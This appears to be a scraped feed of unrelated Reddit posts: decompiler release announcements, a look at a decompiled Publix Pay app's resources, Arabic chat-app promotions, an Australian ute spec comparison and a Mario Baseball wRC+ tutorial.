تداول العملات الأجنبية Rumaila

Reko decompiler 0.11.2 released

submitted by jkl_uxmal to ReverseEngineering [link] [comments]

Sonic-1-2-2013-Decompilation & Sonic-CD-11-Decompilation v1.1.0 released

Sonic-1-2-2013-Decompilation & Sonic-CD-11-Decompilation v1.1.0 released submitted by NerosTie to linux_gaming [link] [comments]

VulnFanatic - Binary Ninja plugin for vulnerability research got updated to version 2.0 with decompiler support!

submitted by Martypx00 to netsec [link] [comments]

Flowey the Decompiler 0.2: Preliminary Script Decompiler

So I released a new version of FTD. It can now decompile scripts and stuff, but it's in alpha so most results produced are not accurate, but still works fine in some cases.
Not sure if anyone still cares for further development, but I guess I'll work on this more if people still do...
And yes, there's still no instance and object generation, but this should come in later versions.
Download link: http://decomp.flower.is/ftdecomp_0.2.exe
submitted by 75pkAj to Underminers [link] [comments]

Publix Pay - Decompiled iOS App 3.0.2

There has been recent chatter on apple apy and google pay etc. Someone recently posted about a system in which you use QR codes to pay. I believe the mods have taken this down under the assumption they think that info can't be shared.

This post is my own opinion, and not on behalf of publix.

I started my analysis by using iTunes 12.3.6 which enables me to download the .ipa files that get installed on your iphones. This is all from the publically available download from the app store.

There is a storyboard folder that is titled: "PublixPay.storyboardc"
Inside this folder there are sub folders called:
"PPScanAndPayViewController.nib"
"PPScanCompleteViewController.nib"
"PPScanHelpViewController.nib"
"EnableBiometricsViewController.nib"

Inside of Info.plist (which is a file that stores keys and then a value that can be used in other places in the app)

NSCameraUsageDescription
Allow camera access so that you can scan the QR code at checkout to pay with your phone.
NSFaceIDUsageDescription
Publix would like to access Face ID for biometric authentication.
submitted by anonpp1987 to publix [link] [comments]

VB Decompiler 10.2 (Visual Basic 5.0/6.0 P-Code and Native Code decompiler) released

submitted by DotFixSoft to ReverseEngineering [link] [comments]

تحميل تطبيق RandoChat للاندرويد 2023 أخر اصدار - موقع برنامج

هل تبحث عن تطبيق غير تقليدي للدردشة، اذاً إليك تطبيق RandoChat للاندرويد أحد أهم تطبيقات الدردشة العشوائية التي تمكنك من التعرف على أصدقاء من كل انحاء العالم.
https://parnamg.info/randochat/

ما هو تطبيق RandoChat

يعد تطبيق RandoChat للاندرويد من تطبيقات الدردشة البارزة والتي يمكن للمستخدمين من خلاله الالتقاء بأصدقاء من أي مكان بالعالم بكل سهولة.

كيفية استخدام تطبيق RandoChat للاندرويد

يهتم العديد من المستخدمين بمعرفة كيفية وطريقة استخدام تطبيق RandoChat للاندرويد ولذلك فإننا في هذه الفقرة سنتحدث بشكل مفصل حول خطوات استخدام RandoChat.
سيتم حذف الرسائل المرسلة فوق قراءتها لدى المستقبل كما يتم حذف عنوان IP الجهاز الخاص بك وكافة بيانات الارتباط الأخرى لا يتم حفظها من الأساس.

خصائص تطبيق RandoChat للدردشة والتعارف

تعد الخصائص من الأمور التي يهتم بها المستخدمون قبل تنزيل واستخدام أي تطبيق بالعادة، خاصة أن هناك عدد هائل من التطبيقات المخصصة للدردشة والتي تجمع عدد هائل من الأشخاص حول العالم ولذلك فإن المستخدم أمامه قدر هائل من الخيارات أمامه ليختار من بينها أي تطبيق شعر بالراحة لاستخدامه.
ومن أبرز خصائص تطبيق RandoChat هو الخصوصية والأمان التي يشعر بها المستخدم الذي سيكون بإمكانه الدخول للتحدث والدردشة مع الأصدقاء من خلال اسم وعنوان مجهول.
والأهم أنه لا وجود لحفظ رسائلك ومراسلاتك ولا يوجد قدرة على التقاطها لأنها ستختفي ويتم حذفها بشكل مباشر بمجرد أن يقوم المستقبل بقراءتها نفس فكرة سناب شات وهذا الأمر يدعم الخصوصية والأمان من الابتزاز ونشر تفاصيل محادثتك الخاصة مع أي شخص.
بالإضافة إلى أن تطبيق RandoChat للاندرويد يمنح المستخدم القدرة على إضافة أي صورة يرغب بها لملفه الخاص لتعبر عنه وتمثله ولا تنسى أنه يمكنك أن تضع صورتك الشخصية الحقيقية إذا كنت ترغب بذلك وجعل الجميع يتعرف على شخصيتك الحقيقية.
يمكن أن يكون أمر إضافة الصور على ملفك الشخصي زيادة لفرصة رغبة الجميع بالتحدث معك والتعرف إليك ولكن هذا الأمر يرجع لرغبتك الخاصة اذا كنت ترغب بالكشف عن هويتك أو ترغب ببقائها مجهولة.
ومن أبرز خصائص تطبيق RandoChat للاندرويد أنه يضع حدودا وقوانين على الانضمام وذلك لحماية الأطفال من الاستغلال والابتزاز ولذلك فإنه يمنع انضمام أي مستخدم تحت عمر 18 عاما.

مميزات تحميل تطبيق RandoChat للاندرويد

اضافة لكل الخصائص التي تحدثنا عنها بالفقرات أعلاه حول تطبيق RandoChat للاندرويد إلا أنه لا يزال هناك العديد من الميزات التي لا يزال لم نتحدث عنها ولذلك فإننا يمكننا الإشارة إلى أبرز مميزات تطبيق RandoChat للاندرويد من خلال النقاط التالية:

اقرأ ايضاً:

  1. افضل برنامج مكالمات فيديو للاندرويد
  2. تحميل القران الكريم بصوت عبد الباسط عبد الصمد للاندرويد كامل مجانا
  3. تحميل تطبيق أسعار الصرف السورية اخر اصدار مجانا
submitted by Any_Pride5891 to u/Any_Pride5891 [link] [comments]

تحميل تطبيق Guya APK للاندرويد 2023 أخر اصدار - موقع برنامج

هل تبحث عن الأصدقاء ومتعة الدردشة إذاً إليك تطبيق Guya APK للاندرويد الذي يعد من أبرز تطبيقات التعارف 2022 المتوفرة على أنظمة الاندرويد، في هذا المقال سنتحدث بشكل مفصل حول تطبيق Guya APK.
https://parnamg.info/guya-apk/

ما هو تطبيق Guya APK للاندرويد

إذا كنت من الأشخاص الذين يعانون من بعض المشكلات بالتواصل أو بمشكلة تكوين الأصدقاء في الواقع، فلابد أنك تلجأ إلى تطبيقات الدردشة والتعارف تطبيق Guya APK للاندرويد من أجل سد هذه الثغرة التي تشعر بها وتسبب لك الشعور بالوحدة والملل طيلة الوقت.
يعد تطبيق Guya APK للاندرويد أهم التطبيقات التي تقدم مجموعات التنشئة الاجتماعية للمستخدمين، وتساعدك على إيجاد الرفيق الذي يشبهك ويتفق معك بالرأي بالإضافة إلى الرفيق الذي يشاركك نفس الاهتمامات.
يحصل المستخدم من خلال تطبيق Guya APK للاندرويد على أفضل تجربة فريدة عبر التواصل الاجتماعي والترفيه وأكثر المنصات تميزًا.

تفاصيل تطبيق Guya للاندرويد

يعد تطبيق Guya APK للاندرويد منصة ترفيهية، تم تطويرها لتوفير عامل المتعة والترفيه للأشخاص، تساعد المستخدمين على إيجاد أصدقاء جدد والتعارف عليها عبر الإنترنت من أي مكان بالعالم.
يمكن من خلال تطبيق Guya APK للاندرويد الحصول على طريقة بسيطة من أجل العثور على الأشخاص الذين يشاركونك ذات الاهتمام من أجل المتعة من خلال خطوات بسيطة جداً سنتحدث عنها في الفقرة القادمة.

طريقة استخدام تطبيق Guya APK 2022

في البداية يتعين عليك تحميل تطبيق Guya APK للاندرويد من خلال الرابط المتاح أسفل المقال، ثم قم بفتح التطبيق بعد تثبيته على الهاتف واتبع الخطوات التالية:
إذا رغبت بالدردشة مع أي صديق، قم بالنقر على قسم الدردشة، تطبيق Guya APK للاندرويد ستظهر إليك قائمة خيارات متعددة للاتصال يمكنك اختيار أحدها من أجل الاستخدام مثل إجراء دردشة صوتية أو مرئية، ويمكن أيضاً دردشة نصية ويمكنك بنقرة زر الوصول إلى الطريقة التي اخترتها بكل سهولة.

خصائص تطبيق Guya APK للدردشة والتعارف

يتضمن تطبيق Guya APK للاندرويد عدد كبير من المستخدمين النشطين وكذلك هناك عدد كبير من المستخدمين الذين يمكنك التواصل معهم، وبالتالي العثور على الأشخاص الذين سيعجبونك ويصبح بينكما اهتمام مشترك.
يتمكن المستخدم من الاطلاع على معلومات الملف التعريف الشخصي الخاص بالأصدقاء من أجل معرفة اهتمامات كل من بعضكما البعض، تطبيق Guya APK للاندرويد ويمكن مشاهدة مقاطع الفيديو التي قام الشخص برفعها.
سيجد المستخدم عبر تطبيق Guya APK العديد من الأشخاص الذين انضموا لهذا التطبيق لذات الهدف وهو التعارف والدردشة، سيكون بإمكانك قضاء وقت ممتع مع الغرباء الذين سيصبحون أصدقائك وحتى تحصل على كافة هذه الميزات عليك تحميل تطبيق Guya APK.

مميزات تطبيق Guya APK للتعارف 2022

يتضمن تطبيق Guya APK للاندرويد العديد من الميزات المذهلة والتي تجعل منه تطبيقاً مميزاً من تطبيقات الدردشة المعتادة وكثيرة الخيارات عبر منصات التواصل الاجتماعي، وأبرز هذه الميزات هي:
  1. يتمكن المستخدم من الحصول على العضوية المميزة وهي ليست مجانية ومع ذلك فهي ليست إلزامية لكافة المستخدمين، ويمكنك الاكتفاء بالخدمات المجانية أما إذا رغبت بالخدمات المميزة يمكنك شرائها.
  2. يتمكن المستخدم تطبيق Guya APK للاندرويد من استكشاف أي ميزة عبر التطبيق بكل سهولة وذلك بفعل واجهته المميزة والمصممة لتسهل على المستخدمين التنقل بمرونة بين تبويبات التطبيق.
  3. حجم تطبيق Guya APK للاندرويد صغير وبسيط ولا يؤثر على إمكانيات الهاتف ولا يستنفذ موارد النظام ولذلك فقد ازداد الإقبال على تحميل تطبيق Guya APK.

اقرأ ايضاً:

  1. برنامج صانع الافلام سامسونج VideoShow
  2. اضافات جوجل كروم لفتح المواقع المحجوبة للاندرويد مجانية
  3. افضل برنامج مكالمات فيديو للاندرويد
submitted by gamesplus24 to u/gamesplus24 [link] [comments]

Did anyone decompile the FNaF World 2.0 update? Does it contain anything new?

submitted by RandomRedditor44 to fivenightsatfreddys [link] [comments]

SWF Decompiler Magic v5.0.2.48 - Extracted from the Flash file is easy

submitted by carvehicle to programming [link] [comments]

NXT Source Code Decompiled on GitHub [version 0.5.2]

submitted by cc5alive to nxtcoin [link] [comments]

A big post on Ute Specs

A big post on Ute Specs
So I have been thinking long and hard about the best way to structure this post due to the large number of questions and conversations that have been had on the subreddit over the last few days especially because there have been a number of articles put out by the lamestream media in regards to utilities and how they are judged.
So I thought I would do this post across a number of metrics.
So this is an on-paper comparison between utes. Some ground rules:
  • I will only be looking at utes you can drive on a Car Licence (So <=4,500kg)
  • I will only assess GCM’s assessable without a Logbook (So <=12,000kg Combined GVM as per HVNL Part 7)
  • I will only Accept “factory” backed cars, not grey imports (So the F150 is out for now)
  • I will be using the “Real tow mass) which allows you to still load the car up. Any other number is advertising puffery.
  • I am assessing base models. Every brand has a base model, what is the top varies by brand. I’m not chasing desired specifications around and around rabbit holes.
The categories I will have in my overall table are:
  • Ute
  • Tare (kg)
  • GVM (kg)
  • Payload (kg)
  • GCM (kg)
  • Fuel Economy (l/100km or Wh/km)
  • Fuel Capcity (l or kWh)
  • Range (km)
  • Power (KW)
  • Torque (Nm)
  • Price (Base)
  • Payload $/kg
  • Towing $/kg
  • Pay+Tow $/kg
  • kW/kg
  • Nm/kg
This will allow us to rank them in various ways
On the shitlist too are:
  • Chevrolet
  • Foton
Because I had to sign up to their mailing lists just to get a brochure
And Isuzu and Mitsubishi Trucks are on the shitlist because I had to call them to get pricing.
Ford is on the shitlist as I have to call them to talk to a "Ranger expert". Go fuck yourselves. I want data, not conversation.
The eCanter Price was Estimated by CarSales, Mitsubishi refuses to give me a price, and when I called just said “Come in and we’ll discuss pricing”....I'm not driving 60km into town to get a price.
Mitsubishi also didn't like the idea of it being downgraded to a car licence, and said it would be 4,495kg "if head office lets us"
Further, the 79 Series pricing and specs is unavailable, and even calling Toyota refused to give even the base prices, or a “Starting From” price and they even refused to email me a spec sheet. Seems Toyota has just shut down any info on the current 79’s that are being made and delivered because the new model is coming.
Finally, the eT60 has no declared GCM. The chat on the website told me to call a dealer and hand over my details, in the end I called my dealer and all he had in front of him was a GCM that seemed to be copy and pasted of 4,050kg which is the GVM. So if you load it up, you can't tow.
Any accessories such as a bullbar take away from your 1,000kg tow capacity.
Admittedly, I got to the point where if I couldn't find the data on the manufacturer website, I threw my hands up and went "Fuck it, they don't care about consumers" and gave up.
Hence, this is the list when I could get all the relevant data without being fucked around.
Anyway, the table:
In case Reddit fucks up the table
The Table in full, if the Reddit table stuff fucks it up

Ute Tare(kg) GVM(kg) Payload(kg) GCM(kg) Real Tow(kg) Economy(l/100km-Wh/km) Fuel Capcity(l-kWh) Range(km) Power(KW) Torque(Nm) Price(Base) Payload $/kg Towing $/kg Pay+Tow $/kg kW/kg Nm/kg
ACE Yewt 900 1,500 600 1,500 0 116.0 23.2 200 45 174 $25,995 $43.33 N/A $43.33 0.0300 0.1160
Chevrolet Silverado 2,481 3,221 740 6,804 3,583 14.7 98 667 313 624 $125,990 $170.26 $35.16 $29.14 0.0460 0.0917
Foton Aumark 2,920 4,495 1,575 7,995 3,500 7.5 160 2,133 115 500 $39,490 $25.07 $11.28 $7.78 0.0144 0.0625
GWM Cannon 1,965 3,130 1,165 5,555 2,425 9.4 78 830 120 400 $27,600 $23.69 $11.38 $7.69 0.0216 0.0720
Hyundai EX4 2,620 4,500 1,880 8,000 3,500 8.2 100 1,220 104 392 $57,000 $30.32 $16.29 $10.59 0.0130 0.0490
Isuzu D-Max 1,620 3,000 1,380 5,300 2,300 9.1 76 835 140 450 $40,769 $29.54 $17.73 $11.08 0.0264 0.0849
Isuzu NLR 2,005 4,500 2,495 8,000 3,500 13.5 75 556 110 375 $59,776 $23.96 $17.08 $9.97 0.0138 0.0469
LDV eT60 3,050 4,050 1,000 4,050 0 88.8 293 330 130 310 $92,990 $92.99 N/A $92.99 0.0321 0.0765
LDV T60 2,115 3,050 935 6,050 3,000 9.2 73 793 160 500 $38,990 $41.70 $13.00 $9.91 0.0264 0.0826
Mahindra Pik-Up 1,755 3,150 1,395 5,650 2,500 8.5 80 941 103 320 $26,990 $19.35 $10.80 $6.93 0.0182 0.0566
Mazda BT50 1,175 3,100 1,925 6,000 2,900 10.2 76 745 140 450 $48,901 $25.40 $16.86 $10.13 0.0233 0.0750
Mitsubishi Canter 2,092 3,510 1,418 7,000 3,490 10.8 100 926 96 300 $54,306 $38.30 $15.56 $11.06 0.0137 0.0429
Mitsubishi eCanter 3,280 7,500 4,220 7,500 0 29.5 41.3 140 135 390 $72,600 $17.20 N/A $17.20 0.0180 0.0520
Mitsubishi Triton 1,584 2,720 1,136 5,130 2,410 8.3 75 904 133 430 $37,240 $32.78 $15.45 $10.50 0.0259 0.0838
Nissan Navara 1,628 2,910 1,282 5,910 3,000 7.2 80 1,111 120 403 $39,103 $30.50 $13.03 $9.13 0.0203 0.0682
RAM 1500 2,620 3,450 830 7,237 3,787 12.2 121 992 291 556 $79,950 $96.33 $21.11 $17.32 0.0402 0.0768
RAM 2500 3,609 4,495 886 11,995 7,500 19.6 117 597 276 1,152 $157,950 $178.27 $21.06 $18.83 0.0230 0.0960
RAM 3500 3,593 4,495 902 11,995 7,500 19.6 117 597 276 1,152 $162,950 $180.65 $21.73 $19.39 0.0230 0.0960
Ssanyong Musso 2,160 3,220 1,060 6,370 3,150 8.2 75 915 133 420 $35,790 $33.76 $11.36 $8.50 0.0209 0.0659
Toyota Hilux 1,495 2,700 1,205 5,200 2,500 11.1 80 721 110 400 $32,384 $26.87 $12.95 $8.74 0.0212 0.0769
Table formatting brought to you by ExcelToReddit
So, that's a lot of Data, so let's do some sorting!

Top 5 Utes by Payload!

  1. Isuzu NLR - 2,495kg
  2. Mazda BT50 - 1,925
  3. Hyundai EX4 - 1,880kg
  4. Foton Aumark - 1,575kg
  5. Mitsubishi Canter - 1,418kg

Worst 5 Utes by Payload

  1. ACE Yewt - 600kg
  2. Chevrolet Silverado - 740kg
  3. RAM 1500 - 830kg
  4. RAM 2500 - 886kg
  5. RAM 3500 - 902kg

Best Real Towing Capacity

  1. RAM 2500 - 7,500kg
  2. RAM 3500 - 7,500kg
  3. RAM 1500 - 3,787kg
  4. Chevrolet Silverado - 3,583kg
  5. Foton Aumark - 3,500kg
  6. Hyundai EX4 - 3,500kg
  7. Isuzu NLR - 3,500kg
  8. Mitsubishi Canter - 3,490kg
  9. LDV T60 - 3,000kg
  10. Nissan Navara - 3,000kg

Worst Real Towing Capacity

  1. ACE Yewt - 0kg
  2. LDV eT60 - 0kg
  3. Mitsubishi eCanter - 0kg
  4. Isuzu D-Max - 2,300kg
  5. Mitsubishi Triton - 2,410kg
  6. GWM Cannon - 2,425
  7. Toyota Hilux - 2.500kg
  8. Mahindra Pik-Up - 2,500kg
  9. Volkswagen Amarok - 2,510kg
  10. Mazda BT50 - 2,900kg

Best Economy

I would just like to caveat that some manufacturers posted Urban, some only posted combined, some didn't say what their number was from
Electric
  1. Mitsubishi eCanter - 29.5Wh/km (I genuinely doubt this)
  2. ACE Yewt - 116Wh/km
  3. LDV eT60 - 293Wh/km
Combustion
  1. Nissan Navara - 7.2l/100km
  2. Foton Aumark - 7.5l/100km
  3. Ssangyong Musso - 8.2l/100km
  4. Hyundai EX4 - 8.2l/100km
  5. Mitsubishi Triton - 8.3l/100km

Worst Economy

  1. RAM 2500 - 19.6L/100km
  2. RAM 3500 - 19.6l/100km
  3. Chevrolet Silverado - 14.7l/100km
  4. Isuzu NLR - 13.5l/100km
  5. RAM 1500 - 12.2l/100km

Best Range

  1. Foton Aumark - 2,133km
  2. Hyundai EX4 - 1,220km
  3. Nissan Navara - 1,111km
  4. RAM 1500 - 992km
  5. Mahindra Pik-Up - 941km

Worst Range

  1. Mitsubishi eCanter - 140km
  2. ACE Yewt - 200km
  3. LDV eT60 - 330km
  4. Isuzu NLR - 556km
  5. RAM 2500 - 597km
  6. RAM 3500 - 567km
  7. Chevrolet Silverado - 667km
  8. Toyota Hilux - 721km
  9. Mazda BT50 - 745km
  10. Volkswagen Amarok - 792km

Most pathetic power

  1. ACE Yewt - 45kW (Peak, 15kW Continuous)
  2. Mitsubishi Canter - 96kW
  3. Mahindra Pik-Up - 103kW
  4. Hyundai EX4 - 104kW
  5. Toyota Hilux - 110kW
  6. Isuzu NLR - 110kW

MOST POWAAAAAAAAAAAAAAAAAAHHHHHHHHH

  1. Chevrolet Silverado - 313kW
  2. RAM 1500 - 291kW
  3. RAM 2500 - 276kW
  4. RAM 3500 - 276kW
  5. LDV T60 - 160kW
  6. Isuzu D-Max - 140kW
  7. Mazda BT50 - 140kW
  8. Mitsubishi eCanter - 135kW
  9. Mitsubishi Triton - 133kW
  10. Ssangyong Musso - 132kW

Weakest tugs

  1. ACE Yewt - 174Nm
  2. Mitsubishi Canter - 300Nm
  3. LDV eT60 - 310Nm
  4. Mahindra Pik-Up - 320Nm
  5. Isuzu NLR - 375Nm

Best to Tug

  1. RAM 2500 - 1,152Nm
  2. RAM 3500 - 1,152Nm
  3. Chevrolet Silverado - 624Nm
  4. RAM 1500 - 556Nm
  5. LDV T60 - 500Nm
  6. Foton Aumark - 500Nm
  7. Isuzu DMax - 450Nm
  8. Mazda BT50 - 450Nm
  9. Mitsubishi Triton - 430Nm
  10. Ssangyong Musso - 420Nm

How Many Body Parts do you need to sell?

Please note that this was another area where Manufacturers liked to Cherry pick data, I am 110% sure that RAM prices are before taxes, and some are Driveaway, that doesn't change the picture too much, as you'll see:
  1. RAM 3500 - $162,950
  2. RAM 2500 - $157,950
  3. Chevrolet Silverado - $125,990
  4. LDV eT60 - $92,990
  5. RAM 1500 - $79,950
Also, I never thought I would see the day when a Chinese Ute would cost more than an American one....but here we are...

Cheapest

ACE Yewt - $25,995

  1. Mahindra Pik-Up - $26,990
  2. GWM Cannon - $27,600
  3. Toyota Hilux - $32,384
  4. Volkswagen Amarok - $34,900

Best $/kg - Payload

  1. Mahindra Pik-Up - $19.35/kg
  2. GWM Cannon - $23.69/kg
  3. Isuzu NLR - $23.96/kg
  4. Foton Aumark - $25.07/kg
  5. Mazda BT50 - $25.40/kg

Worst $/kg - Payload

  1. RAM 3500 - $180.65/kg
  2. RAM 2500 - $178.27/kg
  3. Chevrolet Silverado - $170.26/kg
  4. RAM 1500 - $96.33/kg
  5. LDV eT60 - $92.99/kg

Best $/kg - Towing

  1. Mahindra Pik-Up - $10.80/kg
  2. Foton Aumark - $11.28/kg
  3. SsangYong Musso - $11.36/kg
  4. GWM Cannon - $11.38/kg
  5. Toyota Hilux - $12.95/kg

Worst $/kg Towing

  1. LDV eT60 - Can't Tow
  2. Mitsubishi eCanter - Can't Tow
  3. ACE Yewt - Can't Tow
  4. Chevrolet Silverado - $35.16/kg
  5. RAM 3500 - $21.73/kg
  6. RAM 1500 - $21.11/kg
  7. RAM 2500 - $21.06/kg
  8. Isuzu DMax - 17.73/kg

Most Expensive to Haul Anything $/kg

This is a metric of how much you can haul versus the cost of the vehicle, ergo, these cars are super expensive pekg you can carry and tow
  1. LDV eT60 - $92.99/kg
  2. Mitsubishi eCanter - $59.75/kg
  3. ACE Yewt - 43.33/kg
  4. Chevrolet Silverado - $29.14/kg
  5. RAM 3500 - $19.39/kg

Cheapest Haulers $/kg

  1. Mahindra Pik-Up - $6.93/kg
  2. GWM Cannon - $7.69/kg
  3. Foton Aumark - $7.78/kg
  4. SsangYong Musso - $8.50
  5. Toyota Hilux - $8.74

Most Powerful for GCM

  1. Chevrolet Silverado - 0.0460kW/kg
  2. RAM 1500 - 0.0402kW/kg
  3. LDV eT60 - 0.0321kW/kg
  4. ACE Yewt - 0.0300kW/kg
  5. LDV T60 - 0.0264kW/kg

Least Powerful for GCM

  1. Hyundai EX4 - 0.0130kW/kg
  2. Mitsubishi Canter - 0.0137kW/kg
  3. Isuzu NLR - 0.138kW/kg
  4. Foton Aumark - 0.0144kW/kg
  5. Mitsubish eCanter - 0.0180kW/kg

Highest Torque for GCM

  1. ACE Yewt - 0.1160Nm/kg
  2. RAM 2500 - 0.0960Nm/kg
  3. RAM 3500 - 0.0960Nm/kg
  4. Chevrolet Silverado - 0.0917Nm/kg
  5. Isuzu DMax - 0.0849Nm/kg
  6. Mitsubishi Triton - 0.0838Nm/kg

Lowest Torque for GCM

  1. Mitsubishi Canter - 0.0429Nm/kg
  2. Isuzu NLR - 0.0469Nm/kg
  3. Hyundai EX4 - 0.0490Nm/kg
  4. Mitsubishi eCanter - 0.0520Nm/kg
  5. Mahindra Pik-Up - 0.0566Nm/kg

Summary

If you spend your day crunching numbers, you'll be like me and spend hours staring at spreadsheets
Honestly, best ute is the one you like, with the least issues.
I wouldn't buy half of the Utes on the list for many reasons.
I'm sick of spreadsheets.
submitted by That_Car_Dude_Aus to CarsAustralia [link] [comments]

What if Bowser played in the MLB and Aaron Judge played in Mario Baseball? A look at wRC+ and the true batting king of 2022.

Everyone knows Aaron Judge just finished up his 2022 season with historic batting numbers, including mashing 62 ding dongs to pass Roger Maris for the AL’s most homers hit in a season. But what you probably didn’t know is that far off in the magical world of online Mario Superstar Baseball, the king of the Koopas himself has been hammering longballs at a ridiculously impressive clip. In this post, I’m gonna bring Bowser into the MLB and Aaron Judge into Mario Stadium to determine who is truly the greatest batter of 2022. I apologize for any mobile formatting that doesn't come in correctly, when I edited this on my laptop everything was aligned.
Sabermetrics nerds far and wide will tell you that if you could only choose one stat, weighted runs created plus, or wRC+, is the best all-encompassing batting stat in existence. There are 4 steps to creating wRC+ from scratch, none of which are remotely difficult to understand or require anything but knowledge of basic baseball terminology and 3rd grade math. If you want to skip to the bottom to see how Bowser's numbers would fare in the MLB and Aaron Judge's in the Mushroom Kingdom, skip down to the bottom. Otherwise, I'm gonna lay out some knowledge on your domes because I spent like 3 weekends main-lining coffee to figure out how to write the sql necessary to create wRC+ from scratch for a 17 year old video game and Bowser is absolutely cracked.
The 4 steps are as follows:
1) The Run Expectancy 24 Matrix, also known as RE24
2) Linear Weights
3) wOBA (Weighted On Base Average)
4) wRC+
All of the event values for Bowser have been made available by a small team of people working to decompile the legendary 2005 Nintendo Gamecube game 'Mario Superstar Baseball'. Online game events are sent to a database where I am able to query them and derive stats like wRC+ to show to the rest of the community. If you'd like relive some '05 glory, here is a link to the discord where a handful of very talented individuals have made the game insanely accessible through improvements like the custom emulator Rio (built off of a fork of the gamecube emulator Dolphin), an automated matchmaking discord bot, ranked ladder integration, datamined character values, and more.

Step 1: The RE24 Matrix

The goal of creating wRC+ is to give a value to a batter in terms of the run value that they're creating. Runs are the true batting currency in baseball, and anything that gets us closer to them is going to help us win the game. So before we calculate an individual player's run creation ability, we need to assess the run scoring environment of the league. The 24 in 'RE24' refers to the 24 base-out states that the game can be in. For example, the base-out state at the beginning of the game is 0 runners on, 0 outs. Later on in the inning, the base-out state could be runners on 2nd and 3rd, 2 outs. When you plot these out, you get a neat little box that looks like this:
2022 MLB RE24 Matrix
Runners 0 out 1 out 2 out -- -- -- 0.476 0.254 0.097 1B -- -- 0.865 0.508 0.205 -- 2B -- 1.073 0.667 0.308 -- -- 3B 1.272 0.974 0.377 1B 2B -- 1.435 0.902 0.440 1B -- 3B 1.753 1.147 0.500 -- 2B 3B 2.005 1.390 0.548 1B 2B 3B 2.367 1.508 0.767 
To read this, you would say that at any point in an inning where a team has runners on 1st and 2nd with 1 out, we can, without context, expect them to score an average of .902 runs. To derive these values from scratch, you have to find each time that each of these states happens, add up all the runs that get scored from that point in the inning until the batting team gets 3 outs, then divide by the number of times that state happened. So to make a quick example, lets say there were 25 occurrences in a given year where there were bases loaded and 1 out. We'll say that teams scored a total of 38 runs after that base-out state occurred. 38 runs/25 occurrences = 1.520 expected runs from the bases loaded, 1 out state. There are way more occurrences for each of these states in reality, so we can be pretty confident they're giving us decent expectations.
Here's what this looks like in Mario Baseball: It's much easier to score runs in this game than it is in real life
2022 Mario Baseball RE24 Matrix
Runners 0 Outs 1 Out 2 Out -- -- -- 0.702 0.380 0.153 1B -- -- 1.144 0.655 0.297 -- 2B -- 1.284 0.885 0.447 -- -- 3B 1.608 1.111 0.499 1B 2B -- 1.712 1.071 0.493 1B -- 3B 1.904 1.255 0.641 -- 2B 3B 2.165 1.506 0.703 1B 2B 3B 2.588 1.656 0.807 
When you get this thing filled out, you're able to do cool things like find out the expected run value of a given event. When Nick Pivetta takes the rubber in the top of the 1st on an otherwise nice summer day in Boston and walks the first batter of the game again, the opposing team has moved their run expectancy for the inning from 0.476 to 0.865 (+.389). When he gives up a double to the next batter before you've even found your seat and there's runners on 2nd and 3rd with 0 outs, the opposing team has moved from 0.865 to 2.005 (+1.140). Right when you sit down next to 3 drunk 19 year olds he gives up another double that drives in two runs that moves their expectancy from 2.005 to 1.073 (-0.932 + 2 runs scored = +1.068). But wait -- the value of the first double (1.140) is different from the value of the second double (1.068). What's the true value of a double? This chart just gives the expected value of a base-out state, but lets determine those values next.

Step 2: Linear Weights

The next step in the creation of this stat is deriving the average values of each plate appearance outcome type in terms of run expectancy. These are called Linear Weights values, and are simply the sum of the run expectancy increases for each outcome divided by the number of times that outcome happened. If we were to take our example from before, we had one double worth 1.140 and one worth 1.068. That gives us 2.208, which divided by 2 gives us 1.104. You take every occurrence for the entire season and get something like this:
2022 MLB Linear Weights
BB: .689 HBP: .720 1B: .884 2B: 1.261 3B: 1.601 HR: 2.072 
2022 Mario Baseball Linear Weights
BB/HBP: .724 1B: .808 2B: 1.189 3B: 1.453 HR: 1.982 
These charts don't include every possible outcome of an at bat. You can reach by error, hit into a double play, hit a sac fly, bunt, or get any of these outcomes in any number of ways (flying out to the center field warning track probably has a slightly better value than hitting a soft ground ball to the shortstop) -- when you look up Fangraphs wRC+ values, you're probably seeing a value that is incorporating a bit more batted-ball info into its algorithm. This is the core and is absolutely good enough for shitposting in the offseason.
The one very notable outcome you won't see here is 'Out', and that's because we don't want to include any negative values in our linear weights. The next step in the process of creating wRC+ is creating wOBA which is the sabermetric parallel to OBP. OBP can't be negative, so the smart people that came up with wOBA made sure that someone like Taylor Walls can't step up to the plate for the 466th time of the year with a negative wOBA value. What I posted above is actually the adjusted Linear Weight values. The average run value of an out in Mario Baseball is really -.404, so we bump the rest of the numbers up by that amount to land on the adjusted (true) values.

Step 3: wOBA (Weighted On Base Average)

Like I mentioned previously, wOBA is the sabermetric parallel to OBP. If someone is getting on base at a clip of .450, you know they're absolutely raking. Same goes for wOBA. The difference here is that we're weighing the hit outcomes based on their ability to create runs instead of just saying yes or no to the question of "did the batter reach base?".
So to start, we need to make the league's OBP match the league's wOBA to set that parallel I was talking about. Mario Baseball's league OBP is .4148 and it's league unadjusted wOBA is .4021. To get that unadjusted value, you just take the total value created by each PA outcome according to the linear weights, then divide by the number of PAs. To make the wOBA value match to the OBP value, we divide .4148/.4021 to get what is known as the wOBA Scale value -- in this case, it's 1.0316. Now we multiply that number by our old unadjusted league wOBA value to make the league's wOBA = OBP at .4148. For comparison, the MLB's league wOBA is .310.
Now we can calculate individual player's wOBA values in a bare-bones sort of way.
Aaron Judge
Outcome Count Weight Sum of value bb 130 0.689 89.57 hbp 6 0.72 4.32 1b 87 0.884 76.91 2b 28 1.261 35.31 3b 0 1.601 0 hr 62 2.072 128.46 334.57 pa 696 wOBA: 0.480 
Judge's true wOBA this year was .458, so we're a tad off, but that's close enough for me to chalk the difference up to not incorporating park factors, double plays, and other types of PA outcomes.
Bowser (Bowser really has thousands of PAs, I normalized the numbers to equate with Judge's PAs)
Outcome Count Weight Sum of value bb&hbp 260 0.724 188.24 single 36 0.808 29.09 double 39 1.189 46.37 triple 2 1.453 2.91 HR 66 1.982 130.81 397.42 pa 696 wOBA: 0.571 
Being hit by a pitch is how most players walk their opponents intentionally in Mario Baseball, so the values are the same for a walk or hbp.

Step 4: wRC+

From here you have a pretty easy plug and chug formula to follow to get wRC+
((((Player wOBA - League wOBA) / wOBA Scale Value) / League Runs per PA) +1) *100)
So for Bowser, playing in the Mario Baseball world (.571-.4148/1.0316)/.1757 = .8618 +1 = 1.8618 *100 = 186.2 wRC+
For Judge, with our slightly different numbers (league wOBA, wOBA scale, and runs per PA taken from Fangraphs 'Guts' page)
